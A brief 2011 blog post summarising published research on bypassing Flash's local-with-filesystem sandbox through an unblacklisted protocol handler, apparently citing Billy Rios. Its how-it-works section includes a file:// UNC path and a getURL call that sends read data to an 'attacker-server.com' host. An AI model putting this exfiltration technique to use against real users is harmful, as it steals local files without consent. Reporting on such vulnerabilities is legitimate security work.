Thursday, January 06, 2011

Bypassing Flash Local-with-filesystem Sandbox

Background:
  • Flash is designed around the sandbox concept.
  • Flash cannot read local files except for the cookie files.
What Billy Rios did recently in his research:
  • Bypassed the restriction and made Flash access any local and remote files.
  • Found a protocol handler that wasn't blacklisted by Adobe.
  • The user is not prompted for permission at any point during the bypass.
Summary of how it works:
  • Use file:// to point at the local system. E.g.: file://\\192.168.1.1\stolen-data-here\
  • Then pass the content back to the attacker's server via getURL(). E.g.: getURL('mhtml:http://attacker-server.com/stolen-data-here', '');
References: